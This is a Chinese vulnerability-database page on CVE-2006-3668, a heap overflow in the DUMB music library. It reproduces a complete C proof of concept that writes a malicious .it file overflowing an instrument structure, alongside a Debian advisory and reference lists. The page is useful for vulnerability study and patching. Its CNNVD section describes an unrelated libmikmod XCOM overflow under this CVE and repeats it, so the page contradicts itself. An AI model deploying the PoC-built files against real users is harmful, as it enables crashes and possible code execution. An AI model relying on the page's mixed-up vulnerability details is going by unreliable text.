CVE-2006-3668
CVSS7.6
发布时间 :2006-07-18 11:47:00
修订时间 :2011-10-17 00:00:00
NMCOEPS    

[原文]Heap-based buffer overflow in the it_read_envelope function in Dynamic Universal Music Bibliotheque (DUMB) 0.9.3 and earlier and current CVS as of 20060716, including libdumb, allows user-assisted attackers to execute arbitrary code via a ".it" (Impulse Tracker) file with an envelope with a large number of nodes.


[CNNVD]Libmikmod XCOM处理器远程堆溢出漏洞(CNNVD-200607-235)

        libmikmod是Mikmod所使用的函数库,主要用于播放各种类型的音频模块。
        libmikmod在处理XCOM对象时存在堆溢出漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。
        在处理XCOM块时libmikmod读取了用于指定标注大小的32位数字,然后分配等于该大小加1的内存,以容纳标注末尾可能的空字节。因此如果攻击者使用了0xffffffff值(0xffffffff + 1 = 0)的话,函数库就可能分配0字节的内存。然后在试图读取大小值所指定的内存数量时,就会导致堆溢出。
        loaders/load_gt2.c中的漏洞代码:
        GT_CHUNK *loadChunk(void)
         ...
         if (!memcmp(new_chunk, "XCOM", 4)) {
         new_chunk->xcom.chunk_size = _mm_read_M_ULONG(modreader);
         new_chunk->xcom.comment_len = _mm_read_M_ULONG(modreader);
         new_chunk->xcom.comment = MikMod_malloc(new_chunk->xcom.comment_len + 1);
         _mm_read_UBYTES(new_chunk->xcom.comment, new_chunk->xcom.comment_len, modreader);
         return new_chunk;
         }
         ...
        
        

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3668
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3668
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-235
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27789
(UNKNOWN)  XF  dumb-itreadenvelope-bo(27789)
http://www.vupen.com/english/advisories/2006/2835
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2835
http://www.securityfocus.com/bid/19025
(UNKNOWN)  BID  19025
http://www.gentoo.org/security/en/glsa/glsa-200608-14.xml
(UNKNOWN)  GENTOO  GLSA-200608-14
http://www.debian.org/security/2006/dsa-1123
(UNKNOWN)  DEBIAN  DSA-1123
http://securityreason.com/securityalert/1240
(UNKNOWN)  SREASON  1240
http://secunia.com/advisories/21416
(VENDOR_ADVISORY)  SECUNIA  21416
http://secunia.com/advisories/21184
(UNKNOWN)  SECUNIA  21184
http://secunia.com/advisories/21092
(VENDOR_ADVISORY)  SECUNIA  21092
http://aluigi.altervista.org/adv/dumbit-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/dumbit-adv.txt

- 漏洞信息

Libmikmod XCOM处理器远程堆溢出漏洞
高危 缓冲区溢出
2006-07-18 00:00:00 2006-08-28 00:00:00
远程  
        libmikmod是Mikmod所使用的函数库,主要用于播放各种类型的音频模块。
        libmikmod在处理XCOM对象时存在堆溢出漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。
        在处理XCOM块时libmikmod读取了用于指定标注大小的32位数字,然后分配等于该大小加1的内存,以容纳标注末尾可能的空字节。因此如果攻击者使用了0xffffffff值(0xffffffff + 1 = 0)的话,函数库就可能分配0字节的内存。然后在试图读取大小值所指定的内存数量时,就会导致堆溢出。
        loaders/load_gt2.c中的漏洞代码:
        GT_CHUNK *loadChunk(void)
         ...
         if (!memcmp(new_chunk, "XCOM", 4)) {
         new_chunk->xcom.chunk_size = _mm_read_M_ULONG(modreader);
         new_chunk->xcom.comment_len = _mm_read_M_ULONG(modreader);
         new_chunk->xcom.comment = MikMod_malloc(new_chunk->xcom.comment_len + 1);
         _mm_read_UBYTES(new_chunk->xcom.comment, new_chunk->xcom.comment_len, modreader);
         return new_chunk;
         }
         ...
        
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.mikmod.org/

- 漏洞信息 (2037)

Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC (EDBID:2037)
windows dos
2006-07-19 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>



#define VER         "0.1"
#define BOF         255     // 25 < BOF < 256
#define INSTRSZ     371
#define POCNAME     "proof-of-concept"



void fwi08(FILE *fd, int num);
void fwi16(FILE *fd, int num);
void fwi32(FILE *fd, int num);
void fwb08(FILE *fd, int num);
void fwb16(FILE *fd, int num);
void fwb32(FILE *fd, int num);
void fwstr(FILE *fd, uint8_t *str);
void fwstx(FILE *fd, uint8_t *str, int size);
void fwmem(FILE *fd, uint8_t *data, int size);
int bits2num(uint8_t *bits);
void std_err(void);



#pragma pack(1)
typedef struct {
    uint8_t     sign[4];    // IMPM
    uint8_t     name[26];
    uint16_t    PHiligt;
    uint16_t    OrdNum;
    uint16_t    InsNum;
    uint16_t    SmpNum;
    uint16_t    PatNum;
    uint16_t    Cwtv;
    uint16_t    Cmwt;
    uint16_t    Flags;
    uint16_t    Special;
    uint8_t     GV;
    uint8_t     MV;
    uint8_t     IS;
    uint8_t     IT;
    uint8_t     Sep;
    uint8_t     PWD;
    uint16_t    MsgLgth;
    uint32_t    MsgOff;
    uint32_t    Reserved;
} it_t;

typedef struct {
    uint8_t     Flg;
    uint8_t     Num;
    uint8_t     LpB;
    uint8_t     LpE;
    uint8_t     SLB;
    uint8_t     SLE;
//    int8_t      node_y[25];
//    uint16_t    node_t[25];
} it_env_t;

typedef struct {
    uint8_t     sign[4];    // IMPI
    uint8_t     filename[13];
    uint8_t     NNA;
    uint8_t     DCT;
    uint8_t     DCA;
    uint16_t    FadeOut;
    uint8_t     PPS;
    uint8_t     PPC;
    uint8_t     GbV;
    uint8_t     DfP;
    uint8_t     RV;
    uint8_t     RP;
    uint16_t    TrkVers;
    uint16_t    NoS;
    uint8_t     insname[26];
    uint8_t     IFC;
    uint8_t     IFR;
    uint8_t     MCh;
    uint8_t     MPr;
    uint16_t    MIDIBnk;
    uint8_t     nsample[120];
    uint8_t     ktable[120];
} it_ins_t;
#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    it_t    it;
    it_ins_t    it_ins;
    it_env_t    it_env;
    int     i,
            off;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Dumb <= 0.9.3 (CVS 16 Jul 2006) heap overflow in it_read_envelope "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <output_file.IT>\n"
            "\n"
            "Note: this proof-of-concept is not optimized, it gives only an idea of the bug\n"
            "\n", argv[0]);
        exit(1);
    }

    fname = argv[1];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    memset(&it, 0, sizeof(it));
    memcpy(it.sign, "IMPM", 4);
    strncpy(it.name, POCNAME, sizeof(it.name));
    it.Cmwt   = 0x200;
    it.OrdNum = 1;                              // required
    it.InsNum = 1;                              // envelope is read here

    off =
        sizeof(it) +
        64 +
        64 +
        (it.OrdNum * 1) +
        (it.InsNum * 4) +
        (it.SmpNum * 4) +
        (it.PatNum * 4);

    for(i = 0; i < off; i++) fputc(0, fd);      // create needed space

        /* it_read_instrument */

    memset(&it_ins, 0, sizeof(it_ins));
    memcpy(it_ins.sign, "IMPI", 4);
    strncpy(it_ins.filename, POCNAME, sizeof(it_ins.filename));
    strncpy(it_ins.insname,  POCNAME, sizeof(it_ins.insname));

    fwrite(&it_ins, sizeof(it_ins), 1, fd);

        /* it_read_envelope */

    memset(&it_env, 0, sizeof(it_env));

        /* instrument->volume_envelope */

    it_env.Num = 25;
    fwrite(&it_env, sizeof(it_env), 1, fd);
    for(i = 0; i < it_env.Num; i++) {
        fwi08(fd, 0x61);                        // envelope->node_y[i]
        fwi16(fd, 0x6161);                      // envelope->node_t[i]
    }
    for(i = 75 - (it_env.Num * 3) + 1; i; i--) {
        fwi08(fd, 0);                           // 75 - envelope->n_nodes * 3 + 1
    }

        /* instrument->pan_envelope */

    it_env.Num = 25;
    fwrite(&it_env, sizeof(it_env), 1, fd);
    for(i = 0; i < it_env.Num; i++) {
        fwi08(fd, 0x62);                        // envelope->node_y[i]
        fwi16(fd, 0x6262);                      // envelope->node_t[i]
    }
    for(i = 75 - (it_env.Num * 3) + 1; i; i--) {
        fwi08(fd, 0);                           // 75 - envelope->n_nodes * 3 + 1
    }

        /* instrument->pitch_envelope */

    it_env.Num = BOF;
    fwrite(&it_env, sizeof(it_env), 1, fd);
    for(i = 0; i < it_env.Num; i++) {
        fwi08(fd, 0xff);                        // envelope->node_y[i]
        fwi16(fd, 0xffff);                      // envelope->node_t[i]
    }
    /* 0xff is used for overwriting sampfirst with a negative value! */
    /* m = component[n].sampfirst;                                   */
    /* Note: this PoC is not optimized                               */

    printf(
        "- the IT_INSTRUMENT structure will be overflowed:\n"
        "  there are %d bytes from the end of pitch_envelope to the end of map_sample\n"
        "  while %d bytes will be written by this proof-of-concept\n",
        INSTRSZ,
        ((BOF - 25) * sizeof(unsigned short)) + INSTRSZ);

        /* it_load_sigdata */

    fseek(fd, 0, SEEK_SET);

    fwrite(&it, sizeof(it), 1, fd);

    for(i = 0; i < 64; i++) fwi08(fd, 0);       // sigdata->channel_pan
    for(i = 0; i < 64; i++) fwi08(fd, 0);       // sigdata->channel_volume

    for(i = 0; i < it.OrdNum; i++) {
        fwi08(fd, 255);                         // sigdata->order
    }                                           // 255 for found_some = 0 or will SIGFPE
    for(i = 0; i < it.InsNum; i++) {
        fwi32(fd, off);                         // component[n_components].offset
    }
//    for(i = 0; i < it.SmpNum;  i++) fwi32(fd, off);
//    for(i = 0; i < it.PatNum;  i++) fwi32(fd, off);
//    for(i = 0; i < it.MsgLgth; i++) fwi08(fd, 'a');

    fclose(fd);
    printf("- finished\n");
    return(0);
}



void fwi08(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
}



void fwi16(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
}



void fwi32(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
    fputc((num >> 16) & 0xff, fd);
    fputc((num >> 24) & 0xff, fd);
}



void fwb08(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
}



void fwb16(FILE *fd, int num) {
    fputc((num >>  8) & 0xff, fd);
    fputc((num      ) & 0xff, fd);
}



void fwb32(FILE *fd, int num) {
    fputc((num >> 24) & 0xff, fd);
    fputc((num >> 16) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
    fputc((num      ) & 0xff, fd);
}



void fwstr(FILE *fd, uint8_t *str) {
    fputs(str, fd);
}



void fwstx(FILE *fd, uint8_t *str, int size) {
    int     i;

    for(i = 0; str[i] && (i < size); i++) {
        fputc(str[i], fd);
    }
    for(; i < size; i++) {
        fputc(0, fd);
    }
}



void fwmem(FILE *fd, uint8_t *data, int size) {
    fwrite(data, size, 1, fd);
}



int bits2num(uint8_t *bits) {
    int     i,
            out = 0;

    for(i = 0; i < 32; i++) {
        if(bits[i] == '1') {
            out = (out << 1) | 1;
        } else if(bits[i] == '0') {
            out <<= 1;
        } else {
            break;
        }
    }
    return(out);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2006-07-19]
		

- 漏洞信息 (F48565)

Debian Linux Security Advisory 1123-1 (PacketStormID:F48565)
2006-07-26 00:00:00
Debian  debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2006-3668
[点击下载]

Debian Security Advisory 1123-1 - Luigi Auriemma discovered that DUMB, a tracker music library, performs insufficient sanitising of values parsed from IT music files, which might lead to a buffer overflow and execution of arbitrary code if manipulated files are read.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1123-1                    security@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
July 24th, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libdumb
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2006-3668
Debian Bug     : 379064

Luigi Auriemma discovered that DUMB, a tracker music library, performs
insufficient sanitising of values parsed from IT music files, which might
lead to a buffer overflow and execution of arbitrary code if manipulated
files are read.

For the stable distribution (sarge) this problem has been fixed in
version 0.9.2-6.

For the unstable distribution (sid) this problem has been fixed in
version 0.9.3-5.

We recommend that you upgrade your libdumb packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb_0.9.2-6.dsc
      Size/MD5 checksum:      634 32242f365a1433e66ca9e46a004523df
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb_0.9.2-6.diff.gz
      Size/MD5 checksum:     3914 65aa4b7596e81c622e830bbe1d32ff22
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb_0.9.2.orig.tar.gz
      Size/MD5 checksum:   145722 0ce45f64934e6d5d7b82a55108596680

  Alpha architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_alpha.deb
      Size/MD5 checksum:    75276 b7f57922166c536f19b965d3ab0d88fe
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_alpha.deb
      Size/MD5 checksum:     6090 06c293edff58a482fcf6084c4b5d934a
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_alpha.deb
      Size/MD5 checksum:   121546 715574ff400819fd703793d4ecf75fad
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_alpha.deb
      Size/MD5 checksum:    72390 31d5b7901bc0812b9348eb876cc15b8d

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_amd64.deb
      Size/MD5 checksum:    74780 04d899dbf1e150f1f9568457d34b6fdd
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_amd64.deb
      Size/MD5 checksum:     5244 d0bdb1d783d860280176b190677a4052
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_amd64.deb
      Size/MD5 checksum:   109360 712603865afd1d04e536c453bf1ae373
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_amd64.deb
      Size/MD5 checksum:    52534 87514a167dc9e6a00ee98c496721b2ae

  ARM architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_arm.deb
      Size/MD5 checksum:    73954 edb9623bfb0753b9ac8adf7fba5acfd1
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_arm.deb
      Size/MD5 checksum:     4738 f5afa9198afce1f16e625e7e41618f71
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_arm.deb
      Size/MD5 checksum:   110002 542706c4b04ca773be469d066cce125b
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_arm.deb
      Size/MD5 checksum:    54256 6f59fabcf506f6508e86b42ae6ae78ad

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_i386.deb
      Size/MD5 checksum:    74484 1c721ae454752d3a252f1cfc9a773d41
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_i386.deb
      Size/MD5 checksum:     4738 e4b77e2545480a205f675e39017efc58
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_i386.deb
      Size/MD5 checksum:   108496 ead6a0b39172a059491c864b9985101f
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_i386.deb
      Size/MD5 checksum:    47478 a0d02ff38ef6791845756ca2394a4bc5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_ia64.deb
      Size/MD5 checksum:    76358 88a9e82bf0c85d8f0b6db2a718c40a9a
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_ia64.deb
      Size/MD5 checksum:     6312 953f7b5387e0d99715cf0c7b047bef9a
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_ia64.deb
      Size/MD5 checksum:   134560 53dae1f7002cd4c795c8d42990470973
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_ia64.deb
      Size/MD5 checksum:    78760 0b70e7b9b4e67399e0e7cdfb94c2122d

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_hppa.deb
      Size/MD5 checksum:    75286 7817acef6001881bcea7611ffd538b7d
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_hppa.deb
      Size/MD5 checksum:     5414 b399bd5949caccf4cb02ada6a4b7d4f3
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_hppa.deb
      Size/MD5 checksum:   116320 a69a36e0c23670499781c2a77611bfae
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_hppa.deb
      Size/MD5 checksum:    57774 032d891a6aeda5932fcc8ad6fa64d372

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_m68k.deb
      Size/MD5 checksum:    74204 43c5cd2ae45c7871e27bcb0fc948b17e
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_m68k.deb
      Size/MD5 checksum:     4596 560f752f7433cf6a743a18d4b7636e1d
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_m68k.deb
      Size/MD5 checksum:   105372 785d07eaebf837f71a5ad3b017100f88
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_m68k.deb
      Size/MD5 checksum:    44940 606b5f441e61305b304f58a3bdd1ab5b

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_mips.deb
      Size/MD5 checksum:    74418 d88ed88421fd473176eda13e168b2ae5
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_mips.deb
      Size/MD5 checksum:     5484 fcdfa364a97466a423aa8bf9646fe904
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_mips.deb
      Size/MD5 checksum:   111414 01edc258404ab63fe164fea1930476f2
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_mips.deb
      Size/MD5 checksum:    56954 99e88c70e885558040177fb634c0a027

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_mipsel.deb
      Size/MD5 checksum:    74416 0eda36c34e3962aa3dd84c1a0092372a
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_mipsel.deb
      Size/MD5 checksum:     5468 13f0d69dda9223f444a94ea0ca1d6843
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_mipsel.deb
      Size/MD5 checksum:   111572 f82a7f553c8e1fe5b40bb6d676e7af77
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_mipsel.deb
      Size/MD5 checksum:    57134 c41f1608565019146d563859d8df849f

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_powerpc.deb
      Size/MD5 checksum:    75934 15e1e9c231b1fa79002285249aa1868f
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_powerpc.deb
      Size/MD5 checksum:     4932 bda0bd686f1711f9ba4d9fefb6cd1df4
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_powerpc.deb
      Size/MD5 checksum:   112666 450a7cc5c2c6134dda51bbe17bedade0
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_powerpc.deb
      Size/MD5 checksum:    53122 8c7ef44c26a5eb803456b1484e86780b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_s390.deb
      Size/MD5 checksum:    75080 69120a96775c9ce4da1005e88285bfc7
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_s390.deb
      Size/MD5 checksum:     5118 c80b9f07677b5cd0efef90d75e4f2226
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_s390.deb
      Size/MD5 checksum:   114394 171899c4214e870b72c0be62113d866b
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_s390.deb
      Size/MD5 checksum:    53434 b0d7b9822aae29da009fbe70602992c6

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0_0.9.2-6_sparc.deb
      Size/MD5 checksum:    74112 dfeda909f974a6ca36404bbe87887d5a
    http://security.debian.org/pool/updates/main/libd/libdumb/libaldmb0-dev_0.9.2-6_sparc.deb
      Size/MD5 checksum:     4782 9dcd795ae35d0136d30e36634278a44f
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0_0.9.2-6_sparc.deb
      Size/MD5 checksum:   111376 9e364aa1a08ef44ee0b1704158f9649a
    http://security.debian.org/pool/updates/main/libd/libdumb/libdumb0-dev_0.9.2-6_sparc.deb
      Size/MD5 checksum:    51554 c2d5966066dd655303b3f431bd09de4d


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFExQW4Xm3vHE4uyloRAouZAJ96R9dDMVIHXcgUAWF7p8aBIY/hrQCgiPe6
FpXhO7XJb0I3qa6ppARmmNc=
=Ms9D
-----END PGP SIGNATURE-----




    

- 漏洞信息

27340
DUMB it_read_envelope() Function Crafted .it File ProcessingOverflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-16 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

DUMB Impulse Tracker Files Remote Heap Buffer Overflow Vulnerability
Boundary Condition Error 19025
Yes No
2006-06-26 12:00:00 2006-09-06 11:38:00
Luigi Auriemma is credited with the discovery of this vulnerability.

- 受影响的程序版本

Gentoo Linux
DUMB DUMB 0.9.3
DUMB DUMB 0.9.2
DUMB DUMB 0.9.1
DUMB DUMB 0.9
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1

- 漏洞讨论

A buffer-overflow vulnerability occurs in the DUMB application. This issue is due to the software's failure to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

This issue may allow attackers to execute arbitrary machine code in the context of the affected application, which may facilitate the remote compromise of affected computers.

- 漏洞利用

Example exploit code has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.

Please see the referenced advisories for more information.


DUMB DUMB 0.9.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站